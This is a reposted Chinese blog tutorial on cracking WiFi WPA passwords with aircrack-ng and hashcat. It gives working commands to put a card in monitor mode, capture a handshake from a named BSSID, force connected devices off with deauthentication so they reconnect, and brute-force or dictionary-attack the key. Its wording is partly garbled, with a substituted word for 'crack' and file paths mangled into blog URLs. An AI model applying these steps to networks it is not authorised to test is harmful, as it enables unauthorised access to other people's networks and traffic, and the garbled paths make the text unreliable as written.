要激活成功教程 WIFI 密码,首先要抓到 WIFI 的握手包,要想得到 WIFI 的握手包,就需要在监听时刚好有设备连接了该 WIFI,但这就需要运气加成,因此可以我们可以主动将该 WIFI 的设备踢下去,一般设备就会自动连接该 WIFI,此时我们就抓到握手包了。
命令 说明
aircrack-ng 激活成功教程WEP以及WPA(字典攻击)密钥
airdecap-ng 通过已知密钥来解密WEP或WPA嗅探数据
airmon-ng 将网卡设定为监听模式
aireplay-ng 数据包注入工具(Linux和Windows使用CommView驱动程序)
airodump-ng 数据包嗅探:将无线网络数据输送到PCAP或IVS文件并显示网络信息
airtun-ng 创建虚拟管道
airolib-ng 保存、管理ESSID密码列表
packetforge-ng 创建数据包注入用的加密包。
Tools 混合、转换工具
airbase-ng 软件模拟AP
airdecloak-ng 消除pcap文件中的WEP加密
airdriver-ng 无线设备驱动管理工具
airolib-ng 保存、管理ESSID密码列表,计算对应的密钥
airserv-ng 允许不同的进程访问无线网卡
buddy-ngeasside-ng 的文件描述
easside-ng 和AP接入点通讯(无WEP)
tkiptun-ng WPA/TKIP攻击
wesside-ng 自动激活成功教程WEP密钥
https://cloud.tencent.com/developer/article/?from=15425
抓取 WIFI 握手包
1、将网卡处于监听状态
airmon-ng check
airmon-ng check kill // 关闭影响监听状态的进程
airmon-ng start wlan0
wlan0 是网卡名称,一般都是 wlan0,如果不是则需要根据自己的情况进行修改,可通过 iwconfig 进行查看网卡的名称
当使用 iwconfig 查看网卡名称变为 wlan0mon 说明此时网卡已经处于监听模式了
airodump-ng -c 1 --bssid 5E:C1:1B:A2:37:F1 -w https://blog.csdn.net/_/article/details/ wlan0mon
2)为了顺利得到 WIFI 的握手包,可以将该 WIFI 下的设备强制踢下去
-0 表示端口连接
0 表示断开的次数(0为无数次)
-a 表示要激活成功教程的WIFI路由器 (BSSID列)
-c 表示要踢下线的设备(手机终端) (STATION列)
抓包还可以用 CDLinux 下,水滴工具。
- 握手包转码
hashcat 使用的是 hccapx 后缀的文件,而上面的获取到的 是cap后缀文件,所以要转码。
1)方式一:在线转码, 使用 hashcat 官网提供的在线工具进行格式转换:
https://hashcat.net/cap2hashcat/
会在同目录下生成 1.hccapx 文件
2)方式二:本地工具转码,hashcat-utils-1.9
cap 名字建议使用 MAC地址命名,防止乱
hashcat -a 3 -m 22000 1.hc22000 ?d?d?d?d?d?d?d?d --force
aircrack-ng -w passwd.txt -b 5E:C1:1B:A2:37:F1 https://blog.csdn.net/_/article/details/test.cap
-w 密码字典
-b 设备的MAC(BSSID)
https://blog.csdn.net/_/article/details/test.cap cap文件

版权声明:
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若内容造成侵权、违法违规、事实不符,请将相关资料发送至xkadmin@xkablog.com进行投诉反馈,一经查实,立即处理!
转载请注明出处,原文链接:https://www.xkablog.com/jszy-zyjn/37322.html